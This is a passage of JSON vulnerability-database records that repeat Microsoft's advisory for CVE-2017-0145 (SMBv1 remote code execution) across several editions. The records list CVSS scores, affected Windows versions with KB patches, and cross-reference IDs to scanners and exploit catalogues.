Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T16:51:19", "differentElements": ["msAffectedSoftware"], "edition": 10}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-05T06:46:35", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T06:46:35", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-05T06:46:35", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4012215", "KB3210720", "KB3213986", "KB3205409", "KB3205401", "KB4012214", "KB3212646", "KBMS16-110, 3187754", "KB4013429", "KB4013198", "KB4012216", "KB4012213", "KB4012598", "KB4012212", "KB4012606", "KB4014077", "KB4012217", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T06:46:35", "differentElements": ["msAffectedSoftware"], "edition": 11}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-05T08:49:10", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T08:49:10", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-05T08:49:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB4012212", "KB4014077", "KB3213986", "KB3210720", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB3205409", "KB3212646", "KB3210721", "KB4012214", "KB3177186", "KB4012215", "KB4012213", "KB4012216", "KB4013198", "KB4013429", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T08:49:10", "differentElements": ["msAffectedSoftware"], "edition": 12}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-05T18:46:16", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": 